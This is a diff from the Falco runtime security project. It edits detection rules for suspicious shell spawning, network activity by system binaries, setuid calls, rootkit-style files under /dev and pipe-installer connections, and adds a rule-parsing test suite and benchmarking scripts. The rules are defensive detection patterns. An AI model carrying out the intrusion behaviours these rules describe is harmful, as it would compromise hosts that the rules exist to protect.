+  condition: spawned_process and not container and proc.name = bash and proc.pname exists and not proc.pname in (cron_binaries, bash, sshd, sudo, docker, su, tmux, screen, emacs, systemd, login, flock, fbash, nginx, monit, supervisord, dragent)
   output: "Shell spawned by untrusted binary (user=%user.name shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)"
   priority: WARNING
@@ -284,14 +281,14 @@
 - rule: run_shell_in_container
   desc: a shell was spawned by a non-shell program in a container. Container entrypoints are excluded.
-  condition: container and proc.name = bash and spawned_process and proc.pname exists and not proc.pname in (bash, docker)
+  condition: spawned_process and container and proc.name = bash and proc.pname exists and not proc.pname in (sh, bash, docker)
   output: "Shell spawned in a container other than entrypoint (user=%user.name container_id=%container.id container_name=%container.name shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)"
   priority: WARNING
 # sockfamily ip is to exclude certain processes (like 'groups') that communicate on unix-domain sockets
-- rule: system_binaries_network_activity
+- rule: system_procs_network_activity
   desc: any network activity performed by system binaries that are not expected to send or receive any network traffic
-  condition: (inbound or outbound) and (fd.sockfamily = ip and system_binaries)
+  condition: (fd.sockfamily = ip and system_procs) and (inbound or outbound)
   output: "Known system binary sent/received network traffic (user=%user.name command=%proc.cmdline connection=%fd.name)"
   priority: WARNING
@@ -304,23 +301,23 @@
 # output: "sshd sent error message to syslog (error=%evt.buffer)"
 # priority: WARNING
-# sshd, sendmail-msp, sendmail attempt to setuid to root even when running as non-root. Excluding here to avoid meaningless FPs
+# sshd, mail programs attempt to setuid to root even when running as non-root. Excluding here to avoid meaningless FPs
 - rule: non_sudo_setuid
   desc: an attempt to change users by calling setuid. sudo/su are excluded. user "root" is also excluded, as setuid calls typically involve dropping privileges.
-  condition: evt.type=setuid and evt.dir=> and not user.name=root and not userexec_binaries and not proc.name in (sshd, sendmail-msp, sendmail)
+  condition: evt.type=setuid and evt.dir=> and not user.name=root and not proc.name in (userexec_binaries, mail_binaries, sshd)
   output: "Unexpected setuid call by non-sudo, non-root program (user=%user.name command=%proc.cmdline uid=%evt.arg.uid)"
   priority: WARNING
 - rule: user_mgmt_binaries
   desc: activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded. Activity in containers is also excluded--some containers create custom users on top of a base linux distribution at startup.
-  condition: spawned_process and not proc.name in (su, sudo) and not container and user_mgmt_binaries and not parent_cron and not proc.pname in (systemd, run-parts)
+  condition: spawned_process and proc.name in (user_mgmt_binaries) and not proc.name in (su, sudo) and not container and not proc.pname in (cron_binaries, systemd, run-parts)
   output: "User management binary command run outside of container (user=%user.name command=%proc.cmdline parent=%proc.pname)"
   priority: WARNING
 # (we may need to add additional checks against false positives, see: https://bugs.launchpad.net/ubuntu/+source/rkhunter/+bug/86153)
 - rule: create_files_below_dev
   desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
-  condition: (evt.type = creat or evt.arg.flags contains O_CREAT) and proc.name != blkid and fd.directory = /dev and fd.name != /dev/null
+  condition: fd.directory = /dev and (evt.type = creat or (evt.type = open and evt.arg.flags contains O_CREAT)) and proc.name != blkid and not fd.name in (/dev/null,/dev/stdin,/dev/stdout,/dev/stderr,/dev/tty)
   output: "File created below /dev by untrusted program (user=%user.name command=%proc.cmdline file=%fd.name)"
   priority: WARNING
@@ -339,7 +336,7 @@
 - rule: installer_bash_non_https_connection
   desc: an attempt by a program in a pipe installer session to make an outgoing connection on a non-http(s) port
-  condition: outbound and not fd.sport in (80, 443, 53) and proc.sname=fbash
+  condition: proc.sname=fbash and outbound and not fd.sport in (80, 443, 53)
   output: "Outbound connection on non-http(s) port by a process in a fbash session (command=%proc.cmdline connection=%fd.name)"
   priority: WARNING
@@ -361,7 +358,7 @@
 # as a part of doing the installation
 - rule: installer_bash_runs_pkgmgmt
   desc: an attempt by a program in a pipe installer session to run a package management binary
-  condition: evt.type=execve and package_mgmt_binaries and proc.sname=fbash
+  condition: evt.type=execve and package_mgmt_procs and proc.sname=fbash
   output: "Package management program run by process in a fbash session (command=%proc.cmdline)"
   priority: INFO
@@ -530,6 +527,6 @@
 # - rule: http_server_unexpected_network_inbound
 # desc: inbound network traffic to a http server program on a port other than the standard ports
-# condition: http_server_binaries and inbound and fd.sport != 80 and fd.sport != 443
+# condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
 # output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
 # priority: WARNING
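The write_rpm_database change above swaps an exact `fd.directory` comparison for `fd.name startswith`. Besides letting the engine use the cheaper `startswith` operator, a prefix match on the full path also covers files in subdirectories of /var/lib/rpm, which an exact directory comparison misses. A minimal sketch of the difference in plain Python (illustration only, not Falco filter syntax):

```python
# Illustration: exact parent-directory match vs. path-prefix match.
def exact_directory_match(path, directory):
    # Mirrors fd.directory=/var/lib/rpm: only direct children match.
    return path.rsplit("/", 1)[0] == directory.rstrip("/")

def startswith_match(path, prefix):
    # Mirrors fd.name startswith /var/lib/rpm: anything under the prefix matches.
    return path.startswith(prefix)

direct = "/var/lib/rpm/Packages"
nested = "/var/lib/rpm/tmp/Packages"

assert exact_directory_match(direct, "/var/lib/rpm")
assert not exact_directory_match(nested, "/var/lib/rpm")   # missed by exact match
assert startswith_match(direct, "/var/lib/rpm")
assert startswith_match(nested, "/var/lib/rpm")            # caught by prefix match
```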

test/cpu_monitor.sh Normal file

@@ -0,0 +1,9 @@
#!/bin/bash
SUBJ_PID=$1
BENCHMARK=$2
VARIANT=$3
RESULTS_FILE=$4
CPU_INTERVAL=$5
top -d $CPU_INTERVAL -b -p $SUBJ_PID | grep -E '(falco|sysdig|dragent)' --line-buffered | awk -v benchmark=$BENCHMARK -v variant=$VARIANT '{printf("{\"time\": \"%s\", \"sample\": %d, \"benchmark\": \"%s\", \"variant\": \"%s\", \"cpu_usage\": %s},\n", strftime("%Y-%m-%d %H:%M:%S", systime(), 1), NR, benchmark, variant, $9); fflush();}' >> $RESULTS_FILE
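cpu_monitor.sh writes one JSON object per sample, each followed by a trailing comma, so the results file is not valid JSON as a whole. A small sketch of a loader (the helper name is mine; the field names come from the awk format string above):

```python
import json

def load_cpu_samples(path):
    """Parse the per-sample output of cpu_monitor.sh.

    Each line is a JSON object followed by a trailing comma; strip the
    comma and parse line by line.
    """
    samples = []
    with open(path) as f:
        for line in f:
            line = line.strip().rstrip(",")
            if line:
                samples.append(json.loads(line))
    return samples
```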

test/empty.scap Normal file

Binary file not shown.


@@ -0,0 +1,186 @@
- rule: no_warnings
desc: Rule with no warnings
condition: evt.type=execve
output: "None"
priority: WARNING
- rule: no_evttype
desc: No evttype at all
condition: proc.name=foo
output: "None"
priority: WARNING
- rule: evttype_not_equals
desc: Using != for event type
condition: evt.type!=execve
output: "None"
priority: WARNING
- rule: leading_not
desc: condition starts with not
condition: not evt.type=execve
output: "None"
priority: WARNING
- rule: not_equals_after_evttype
desc: != after evt.type, not affecting results
condition: evt.type=execve and proc.name!=foo
output: "None"
priority: WARNING
- rule: not_after_evttype
desc: not operator after evt.type, not affecting results
condition: evt.type=execve and not proc.name=foo
output: "None"
priority: WARNING
- rule: leading_trailing_evttypes
desc: evttype at beginning and end
condition: evt.type=execve and proc.name=foo or evt.type=open
output: "None"
priority: WARNING
- rule: leading_multtrailing_evttypes
desc: one evttype at beginning, multiple at end
condition: evt.type=execve and proc.name=foo or evt.type=open or evt.type=connect
output: "None"
priority: WARNING
- rule: leading_multtrailing_evttypes_using_in
desc: one evttype at beginning, multiple at end, using in
condition: evt.type=execve and proc.name=foo or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: not_equals_at_end
desc: not_equals at final evttype
condition: evt.type=execve and proc.name=foo or evt.type=open or evt.type!=connect
output: "None"
priority: WARNING
- rule: not_at_end
desc: not operator for final evttype
condition: evt.type=execve and proc.name=foo or evt.type=open or not evt.type=connect
output: "None"
priority: WARNING
- rule: not_before_trailing_evttype
desc: a not before a trailing event type
condition: evt.type=execve and not proc.name=foo or evt.type=open
output: "None"
priority: WARNING
- rule: not_equals_before_trailing_evttype
desc: a != before a trailing event type
condition: evt.type=execve and proc.name!=foo or evt.type=open
output: "None"
priority: WARNING
- rule: not_equals_and_not
desc: both != and not before event types
condition: evt.type=execve and proc.name!=foo or evt.type=open or not evt.type=connect
output: "None"
priority: WARNING
- rule: not_equals_before_in
desc: != before an in with event types
condition: evt.type=execve and proc.name!=foo or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: not_before_in
desc: a not before an in with event types
condition: evt.type=execve and not proc.name=foo or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: not_in_before_in
desc: a not with in before an in with event types
condition: evt.type=execve and not proc.name in (foo, bar) or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: evttype_in
desc: using in for event types
condition: evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: evttype_in_plus_trailing
desc: using in for event types and a trailing evttype
condition: evt.type in (execve, open) and proc.name=foo or evt.type=connect
output: "None"
priority: WARNING
- rule: leading_in_not_equals_before_evttype
desc: initial in() for event types, then a != before an additional event type
condition: evt.type in (execve, open) and proc.name!=foo or evt.type=connect
output: "None"
priority: WARNING
- rule: leading_in_not_equals_at_evttype
desc: initial in() for event types, then a != with an additional event type
condition: evt.type in (execve, open) or evt.type!=connect
output: "None"
priority: WARNING
- rule: not_with_evttypes
desc: not in for event types
condition: not evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: not_with_evttypes_addl
desc: not in for event types, and an additional event type
condition: not evt.type in (execve, open) or evt.type=connect
output: "None"
priority: WARNING
- rule: not_equals_before_evttype
desc: != before any event type
condition: proc.name!=foo and evt.type=execve
output: "None"
priority: WARNING
- rule: not_equals_before_in_evttype
desc: != before any event type using in
condition: proc.name!=foo and evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: not_before_evttype
desc: not operator before any event type
condition: not proc.name=foo and evt.type=execve
output: "None"
priority: WARNING
- rule: not_before_evttype_using_in
desc: not operator before any event type using in
condition: not proc.name=foo and evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: repeated_evttypes
desc: event types appearing multiple times
condition: evt.type=open or evt.type=open
output: "None"
priority: WARNING
- rule: repeated_evttypes_with_in
desc: event types appearing multiple times with in
condition: evt.type in (open, open)
output: "None"
priority: WARNING
- rule: repeated_evttypes_with_separate_in
desc: event types appearing multiple times with separate ins
condition: evt.type in (open) or evt.type in (open, open)
output: "None"
priority: WARNING
- rule: repeated_evttypes_with_mix
desc: event types appearing multiple times with mix of = and in
condition: evt.type=open or evt.type in (open, open)
output: "None"
priority: WARNING
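The rules above exercise the new event-type extraction in the falco engine (the group-rules-by-event-type change from sysdig#627/falco#101). As a very rough illustration of the idea, and not the real engine logic, which handles many more of the corner cases listed above: evt.type checks with `=` or `in` contribute to a rule's event-type prefilter, while a negated check (`not` or `!=`) forces the rule to fall back to all event types.

```python
import re

def extract_evttypes(condition):
    """Rough sketch of falco's event-type extraction heuristic.

    Returns the set of event types a rule could match, or {'all'} when a
    negated check ('not' or '!=') makes evt.type unusable as a prefilter.
    Illustration only; the real engine handles far more corner cases.
    """
    evttypes = set()
    pattern = re.compile(r'(not\s+)?evt\.type\s*(=|!=|in)\s*(\(([^)]*)\)|(\S+))')
    for m in pattern.finditer(condition):
        if m.group(1) or m.group(2) == '!=':
            return {'all'}          # negation: cannot prefilter by type
        if m.group(2) == 'in':
            evttypes.update(t.strip() for t in m.group(4).split(','))
        else:
            evttypes.add(m.group(5))
    return evttypes if evttypes else {'all'}
```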


@@ -3,6 +3,7 @@
 import os
 import re
 import json
+import sets
 from avocado import Test
 from avocado.utils import process
@@ -16,9 +17,34 @@ class FalcoTest(Test):
         """
         self.falcodir = self.params.get('falcodir', '/', default=os.path.join(self.basedir, '../build'))
-        self.should_detect = self.params.get('detect', '*')
+        self.should_detect = self.params.get('detect', '*', default=False)
         self.trace_file = self.params.get('trace_file', '*')
-        self.json_output = self.params.get('json_output', '*')
+        if not os.path.isabs(self.trace_file):
+            self.trace_file = os.path.join(self.basedir, self.trace_file)
+
+        self.json_output = self.params.get('json_output', '*', default=False)
+
+        self.rules_file = self.params.get('rules_file', '*', default=os.path.join(self.basedir, '../rules/falco_rules.yaml'))
+        if not os.path.isabs(self.rules_file):
+            self.rules_file = os.path.join(self.basedir, self.rules_file)
+
+        self.rules_warning = self.params.get('rules_warning', '*', default=False)
+        if self.rules_warning == False:
+            self.rules_warning = sets.Set()
+        else:
+            self.rules_warning = sets.Set(self.rules_warning)
+
+        # Maps from rule name to set of evttypes
+        self.rules_events = self.params.get('rules_events', '*', default=False)
+        if self.rules_events == False:
+            self.rules_events = {}
+        else:
+            events = {}
+            for item in self.rules_events:
+                for item2 in item:
+                    events[item2[0]] = sets.Set(item2[1])
+            self.rules_events = events
+
         if self.should_detect:
             self.detect_level = self.params.get('detect_level', '*')
@@ -33,21 +59,38 @@ class FalcoTest(Test):
         self.str_variant = self.trace_file
 
-    def test(self):
-        self.log.info("Trace file %s", self.trace_file)
-
-        # Run the provided trace file though falco
-        cmd = '{}/userspace/falco/falco -r {}/../rules/falco_rules.yaml -c {}/../falco.yaml -e {} -o json_output={}'.format(
-            self.falcodir, self.falcodir, self.falcodir, self.trace_file, self.json_output)
-
-        self.falco_proc = process.SubProcess(cmd)
-
-        res = self.falco_proc.run(timeout=60, sig=9)
-
-        if res.exit_status != 0:
-            self.error("Falco command \"{}\" exited with non-zero return value {}".format(
-                cmd, res.exit_status))
+    def check_rules_warnings(self, res):
+
+        found_warning = sets.Set()
+
+        for match in re.finditer('Rule ([^:]+): warning \(([^)]+)\):', res.stderr):
+            rule = match.group(1)
+            warning = match.group(2)
+            found_warning.add(rule)
+
+        self.log.debug("Expected warning rules: {}".format(self.rules_warning))
+        self.log.debug("Actual warning rules: {}".format(found_warning))
+
+        if found_warning != self.rules_warning:
+            self.fail("Expected rules with warnings {} does not match actual rules with warnings {}".format(self.rules_warning, found_warning))
+
+    def check_rules_events(self, res):
+
+        found_events = {}
+
+        for match in re.finditer('Event types for rule ([^:]+): (\S+)', res.stderr):
+            rule = match.group(1)
+            events = sets.Set(match.group(2).split(","))
+            found_events[rule] = events
+
+        self.log.debug("Expected events for rules: {}".format(self.rules_events))
+        self.log.debug("Actual events for rules: {}".format(found_events))
+
+        for rule in found_events.keys():
+            if found_events.get(rule) != self.rules_events.get(rule):
+                self.fail("rule {}: expected events {} differs from actual events {}".format(rule, self.rules_events.get(rule), found_events.get(rule)))
+
+    def check_detections(self, res):
         # Get the number of events detected.
         match = re.search('Events detected: (\d+)', res.stdout)
         if match is None:
@@ -73,6 +116,7 @@ class FalcoTest(Test):
         if not events_detected > 0:
             self.fail("Detected {} events at level {} when should have detected > 0".format(events_detected, self.detect_level))
 
+    def check_json_output(self, res):
         if self.json_output:
             # Just verify that any lines starting with '{' are valid json objects.
             # Doesn't do any deep inspection of the contents.
@@ -82,6 +126,27 @@ class FalcoTest(Test):
                 for attr in ['time', 'rule', 'priority', 'output']:
                     if not attr in obj:
                         self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr))
 
+    def test(self):
+        self.log.info("Trace file %s", self.trace_file)
+
+        # Run the provided trace file though falco
+        cmd = '{}/userspace/falco/falco -r {} -c {}/../falco.yaml -e {} -o json_output={} -v'.format(
+            self.falcodir, self.rules_file, self.falcodir, self.trace_file, self.json_output)
+
+        self.falco_proc = process.SubProcess(cmd)
+
+        res = self.falco_proc.run(timeout=180, sig=9)
+
+        if res.exit_status != 0:
+            self.error("Falco command \"{}\" exited with non-zero return value {}".format(
+                cmd, res.exit_status))
+
+        self.check_rules_warnings(res)
+        if len(self.rules_events) > 0:
+            self.check_rules_events(res)
+        self.check_detections(res)
+        self.check_json_output(res)
         pass
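With `-v`, falco prints rule warnings and per-rule event types to stderr, which check_rules_warnings and check_rules_events scrape with the regexes shown above. A standalone check of those same regexes; the sample stderr text is invented for illustration, only the line shapes matter:

```python
import re

# Hypothetical stderr sample in the shape the harness expects.
sample_stderr = (
    "Rule no_evttype: warning (no-evttype): rule matches too many evt.types\n"
    "Event types for rule no_evttype: all\n"
    "Event types for rule no_warnings: execve\n"
)

# Same patterns the test harness applies to falco's verbose output.
warnings = {m.group(1)
            for m in re.finditer(r'Rule ([^:]+): warning \(([^)]+)\):', sample_stderr)}
events = {m.group(1): set(m.group(2).split(','))
          for m in re.finditer(r'Event types for rule ([^:]+): (\S+)', sample_stderr)}
```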

test/falco_tests.yaml.in Normal file

@@ -0,0 +1,62 @@
trace_files: !mux
builtin_rules_no_warnings:
detect: False
trace_file: empty.scap
rules_warning: False
test_warnings:
detect: False
trace_file: empty.scap
rules_file: falco_rules_warnings.yaml
rules_warning:
- no_evttype
- evttype_not_equals
- leading_not
- not_equals_at_end
- not_at_end
- not_before_trailing_evttype
- not_equals_before_trailing_evttype
- not_equals_and_not
- not_equals_before_in
- not_before_in
- not_in_before_in
- leading_in_not_equals_before_evttype
- leading_in_not_equals_at_evttype
- not_with_evttypes
- not_with_evttypes_addl
- not_equals_before_evttype
- not_equals_before_in_evttype
- not_before_evttype
- not_before_evttype_using_in
rules_events:
- no_warnings: [execve]
- no_evttype: [all]
- evttype_not_equals: [all]
- leading_not: [all]
- not_equals_after_evttype: [execve]
- not_after_evttype: [execve]
- leading_trailing_evttypes: [execve,open]
- leading_multtrailing_evttypes: [connect,execve,open]
- leading_multtrailing_evttypes_using_in: [connect,execve,open]
- not_equals_at_end: [all]
- not_at_end: [all]
- not_before_trailing_evttype: [all]
- not_equals_before_trailing_evttype: [all]
- not_equals_and_not: [all]
- not_equals_before_in: [all]
- not_before_in: [all]
- not_in_before_in: [all]
- evttype_in: [execve,open]
- evttype_in_plus_trailing: [connect,execve,open]
- leading_in_not_equals_before_evttype: [all]
- leading_in_not_equals_at_evttype: [all]
- not_with_evttypes: [all]
- not_with_evttypes_addl: [all]
- not_equals_before_evttype: [all]
- not_equals_before_in_evttype: [all]
- not_before_evttype: [all]
- not_before_evttype_using_in: [all]
- repeated_evttypes: [open]
- repeated_evttypes_with_in: [open]
- repeated_evttypes_with_separate_in: [open]
- repeated_evttypes_with_mix: [open]
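The rules_events entries above are a YAML list of single-pair mappings that the test harness flattens into a dict mapping rule name to a set of event types. A sketch of that flattening in modern Python (the committed harness uses the Python 2 `sets` module and slightly different iteration):

```python
def flatten_rules_events(entries):
    """Flatten [{'no_warnings': ['execve']}, {'no_evttype': ['all']}]
    into {'no_warnings': {'execve'}, 'no_evttype': {'all'}}.

    Mirrors the intent of the loop in falco_test.py, using the built-in
    set type instead of the deprecated Python 2 `sets` module.
    """
    events = {}
    for entry in entries:
        for rule, evttypes in entry.items():
            events[rule] = set(evttypes)
    return events
```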

test/plot-live.r Normal file

@@ -0,0 +1,40 @@
require(jsonlite)
library(ggplot2)
library(GetoptLong)
initial.options <- commandArgs(trailingOnly = FALSE)
file.arg.name <- "--file="
script.name <- sub(file.arg.name, "", initial.options[grep(file.arg.name, initial.options)])
script.basename <- dirname(script.name)
if (substr(script.basename, 1, 1) != '/') {
script.basename = paste(getwd(), script.basename, sep='/')
}
results = paste(script.basename, "results.json", sep='/')
output = "./output.png"
GetoptLong(
"results=s", "Path to results file",
"benchmark=s", "Benchmark from results file to graph",
"variant=s@", "Variant(s) to include in graph. Can be specified multiple times",
"output=s", "Output graph file"
)
res <- fromJSON(results, flatten=TRUE)
res2 = res[res$benchmark == benchmark & res$variant %in% variant,]
plot <- ggplot(data=res2, aes(x=sample, y=cpu_usage, group=variant, colour=variant)) +
geom_line() +
ylab("CPU Usage (%)") +
xlab("Time") +
ggtitle(sprintf("Falco/Sysdig CPU Usage: %s", benchmark))
theme(legend.position=c(.2, .88));
print(paste("Writing graph to", output, sep=" "))
ggsave(file=output)

test/plot-traces.r Normal file

@@ -0,0 +1,35 @@
require(jsonlite)
library(ggplot2)
library(reshape)
res <- fromJSON("/home/mstemm/results.txt", flatten=TRUE)
plot <- ggplot(data=res, aes(x=config, y=elapsed.real)) +
geom_bar(stat = "summary", fun.y = "mean") +
coord_flip() +
facet_grid(shortfile ~ .) +
ylab("Wall Clock Time (sec)") +
xlab("Trace File/Program")
ggsave(file="/mnt/sf_mstemm/res-real.png")
plot <- ggplot(data=res, aes(x=config, y=elapsed.user)) +
geom_bar(stat = "summary", fun.y = "mean") +
coord_flip() +
facet_grid(shortfile ~ .) +
ylab("User Time (sec)") +
xlab("Trace File/Program")
ggsave(file="/mnt/sf_mstemm/res-user.png")
res2 <- melt(res, id.vars = c("config", "shortfile"), measure.vars = c("elapsed.sys", "elapsed.user"))
plot <- ggplot(data=res2, aes(x=config, y=value, fill=variable, order=variable)) +
geom_bar(stat = "summary", fun.y = "mean") +
coord_flip() +
facet_grid(shortfile ~ .) +
ylab("User/System Time (sec)") +
xlab("Trace File/Program")
ggsave(file="/mnt/sf_mstemm/res-sys-user.png")


@ -0,0 +1,391 @@
#!/bin/bash
#set -x
trap "cleanup; exit" SIGHUP SIGINT SIGTERM
function download_trace_files() {
(mkdir -p $TRACEDIR && rm -rf $TRACEDIR/traces-perf && curl -fo $TRACEDIR/traces-perf.zip https://s3.amazonaws.com/download.draios.com/falco-tests/traces-perf.zip && unzip -d $TRACEDIR $TRACEDIR/traces-perf.zip && rm -f $TRACEDIR/traces-perf.zip) || exit 1
}
function time_cmd() {
cmd="$1"
file="$2"
benchmark=`basename $file .scap`
echo -n "$benchmark: "
for i in `seq 1 5`; do
echo -n "$i "
time=`date --iso-8601=sec`
/usr/bin/time -a -o $RESULTS_FILE --format "{\"time\": \"$time\", \"benchmark\": \"$benchmark\", \"file\": \"$file\", \"variant\": \"$VARIANT\", \"elapsed\": {\"real\": %e, \"user\": %U, \"sys\": %S}}," $cmd >> $OUTPUT_FILE 2>&1
done
echo ""
}
function run_falco_on() {
file="$1"
cmd="$ROOT/userspace/falco/falco -c $ROOT/../falco.yaml -r $ROOT/../rules/falco_rules.yaml --option=stdout_output.enabled=false -e $file"
time_cmd "$cmd" "$file"
}
function run_sysdig_on() {
file="$1"
cmd="$ROOT/userspace/sysdig/sysdig -N -z -r $file evt.type=none"
time_cmd "$cmd" "$file"
}
function write_agent_config() {
cat > $ROOT/userspace/dragent/dragent.yaml <<EOF
customerid: XXX
app_checks_enabled: false
log:
file_priority: info
console_priority: info
event_priority: info
jmx:
enabled: false
statsd:
enabled: false
collector: collector-staging.sysdigcloud.com
EOF
if [ $FALCO_AGENT == 1 ]; then
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
falco_engine:
enabled: true
rules_filename: /etc/falco_rules.yaml
sampling_multiplier: 0
EOF
else
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
falco_engine:
enabled: false
EOF
fi
if [ $AGENT_AUTODROP == 1 ]; then
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
autodrop:
enabled: true
EOF
else
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
autodrop:
enabled: false
EOF
fi
cat $ROOT/userspace/dragent/dragent.yaml
}
function run_agent_on() {
file="$1"
write_agent_config
cmd="$ROOT/userspace/dragent/dragent -r $file"
time_cmd "$cmd" "$file"
}
function run_trace() {
if [ ! -e $TRACEDIR ]; then
download_trace_files
fi
trace_file="$1"
if [ $trace_file == "all" ]; then
files=($TRACEDIR/traces-perf/*.scap)
else
files=($TRACEDIR/traces-perf/$trace_file.scap)
fi
for file in ${files[@]}; do
if [[ $ROOT == *"falco"* ]]; then
run_falco_on "$file"
elif [[ $ROOT == *"sysdig"* ]]; then
run_sysdig_on "$file"
else
run_agent_on "$file"
fi
done
}
function start_monitor_cpu_usage() {
echo " monitoring cpu usage for sysdig/falco program"
setsid bash `dirname $0`/cpu_monitor.sh $SUBJ_PID $live_test $VARIANT $RESULTS_FILE $CPU_INTERVAL &
CPU_PID=$!
sleep 5
}
function start_subject_prog() {
echo " starting falco/sysdig/agent program"
# Do a blocking sudo command now just to ensure we have a password
sudo bash -c ""
if [[ $ROOT == *"falco"* ]]; then
sudo $ROOT/userspace/falco/falco -c $ROOT/../falco.yaml -r $ROOT/../rules/falco_rules.yaml --option=stdout_output.enabled=false > ./prog-output.txt 2>&1 &
elif [[ $ROOT == *"sysdig"* ]]; then
sudo $ROOT/userspace/sysdig/sysdig -N -z evt.type=none &
else
write_agent_config
pushd $ROOT/userspace/dragent
sudo ./dragent > ./prog-output.txt 2>&1 &
popd
fi
SUDO_PID=$!
sleep 5
if [[ $ROOT == *"agent"* ]]; then
# The agent spawns several processes all below a main monitor
# process. We want the child with the lowest pid.
MON_PID=`ps -h -o pid --ppid $SUDO_PID`
SUBJ_PID=`ps -h -o pid --ppid $MON_PID | head -1`
else
SUBJ_PID=`ps -h -o pid --ppid $SUDO_PID`
fi
if [ -z $SUBJ_PID ]; then
echo "Could not find pid of subject program--did it start successfully? Not continuing."
exit 1
fi
}
function run_htop() {
screen -S htop-screen -d -m /usr/bin/htop -d2
sleep 90
screen -X -S htop-screen quit
}
function run_juttle_examples() {
pushd $SCRIPTDIR/../../juttle-engine/examples
docker-compose -f dc-juttle-engine.yml -f aws-cloudwatch/dc-aws-cloudwatch.yml -f elastic-newstracker/dc-elastic.yml -f github-tutorial/dc-elastic.yml -f nginx_logs/dc-nginx-logs.yml -f postgres-diskstats/dc-postgres.yml -f cadvisor-influx/dc-cadvisor-influx.yml up -d
sleep 120
docker-compose -f dc-juttle-engine.yml -f aws-cloudwatch/dc-aws-cloudwatch.yml -f elastic-newstracker/dc-elastic.yml -f github-tutorial/dc-elastic.yml -f nginx_logs/dc-nginx-logs.yml -f postgres-diskstats/dc-postgres.yml -f cadvisor-influx/dc-cadvisor-influx.yml stop
docker-compose -f dc-juttle-engine.yml -f aws-cloudwatch/dc-aws-cloudwatch.yml -f elastic-newstracker/dc-elastic.yml -f github-tutorial/dc-elastic.yml -f nginx_logs/dc-nginx-logs.yml -f postgres-diskstats/dc-postgres.yml -f cadvisor-influx/dc-cadvisor-influx.yml rm -fv
popd
}
function run_kubernetes_demo() {
pushd $SCRIPTDIR/../../infrastructure/test-infrastructures/kubernetes-demo
bash run-local.sh
bash init.sh
sleep 600
docker stop $(docker ps -qa)
docker rm -fv $(docker ps -qa)
popd
}
function run_live_test() {
live_test="$1"
echo "Running live test $live_test"
case "$live_test" in
htop ) CPU_INTERVAL=2;;
* ) CPU_INTERVAL=10;;
esac
start_subject_prog
start_monitor_cpu_usage
echo " starting live program and waiting for it to finish"
case "$live_test" in
htop ) run_htop ;;
juttle-examples ) run_juttle_examples ;;
kube-demo ) run_kubernetes_demo ;;
* ) usage; cleanup; exit 1 ;;
esac
cleanup
}
function cleanup() {
if [ -n "$SUBJ_PID" ] ; then
echo " stopping falco/sysdig program $SUBJ_PID"
sudo kill $SUBJ_PID
fi
if [ -n "$CPU_PID" ] ; then
echo " stopping cpu monitor program $CPU_PID"
kill -- -$CPU_PID
fi
}
run_live_tests() {
test="$1"
if [ $test == "all" ]; then
tests="htop juttle-examples kube-demo"
else
tests=$test
fi
for test in $tests; do
run_live_test $test
done
}
function run_phoronix_test() {
live_test="$1"
case "$live_test" in
pts/aio-stress | pts/fs-mark | pts/iozone | pts/network-loopback | pts/nginx | pts/pybench | pts/redis | pts/sqlite | pts/unpack-linux ) CPU_INTERVAL=2;;
* ) CPU_INTERVAL=10;;
esac
echo "Running phoronix test $live_test"
start_subject_prog
start_monitor_cpu_usage
echo " starting phoronix test and waiting for it to finish"
TEST_RESULTS_NAME=$VARIANT FORCE_TIMES_TO_RUN=1 phoronix-test-suite default-run $live_test
cleanup
}
# To install and configure phoronix:
# (redhat instructions, adapt as necessary for ubuntu or other distros)
# - install phoronix: yum install phoronix-test-suite.noarch
# - install dependencies not handled by phoronix: yum install libaio-devel pcre-devel popt-devel glibc-static zlib-devel nc bc
# - fix trivial bugs in tests:
# - edit ~/.phoronix-test-suite/installed-tests/pts/network-loopback-1.0.1/network-loopback line "nc -d -l 9999 > /dev/null &" to "nc -d -l 9999 > /dev/null &"
# - edit ~/.phoronix-test-suite/test-profiles/pts/nginx-1.1.0/test-definition.xml line "<Arguments>-n 500000 -c 100 http://localhost:8088/test.html</Arguments>" to "<Arguments>-n 500000 -c 100 http://127.0.0.1:8088/test.html</Arguments>"
# - phoronix batch-install <test list below>
function run_phoronix_tests() {
test="$1"
if [ $test == "all" ]; then
tests="pts/aio-stress pts/apache pts/blogbench pts/compilebench pts/dbench pts/fio pts/fs-mark pts/iozone pts/network-loopback pts/nginx pts/pgbench pts/phpbench pts/postmark pts/pybench pts/redis pts/sqlite pts/unpack-linux"
else
tests=$test
fi
for test in $tests; do
run_phoronix_test $test
done
}
run_tests() {
IFS=':' read -ra PARTS <<< "$TEST"
case "${PARTS[0]}" in
trace ) run_trace "${PARTS[1]}" ;;
live ) run_live_tests "${PARTS[1]}" ;;
phoronix ) run_phoronix_tests "${PARTS[1]}" ;;
* ) usage; exit 1 ;;
esac
}
usage() {
echo "Usage: $0 [options]"
echo ""
echo "Options:"
echo " -h/--help: show this help"
echo " -v/--variant: a variant name to attach to this set of test results"
echo " -r/--root: root directory containing falco/sysdig binaries (i.e. where you ran 'cmake')"
echo " -R/--results: append test results to this file"
echo " -o/--output: append program output to this file"
echo " -t/--test: test to run. Argument has the following format:"
echo " trace:<trace>: read the specified trace file."
echo " trace:all means run all traces"
echo " live:<live test>: run the specified live test."
echo " live:all means run all live tests."
echo " possible live tests:"
echo " live:htop: run htop -d2"
echo " live:kube-demo: run kubernetes demo from infrastructure repo"
echo " live:juttle-examples: run a juttle demo environment based on docker-compose"
echo " phoronix:<test>: run the specified phoronix test."
echo " if <test> is not 'all', it is passed directly to the command line of \"phoronix-test-suite run <test>\""
echo " if <test> is 'all', a built-in set of phoronix tests will be chosen and run"
echo " -T/--tracedir: Look for trace files in this directory. If doesn't exist, will download trace files from s3"
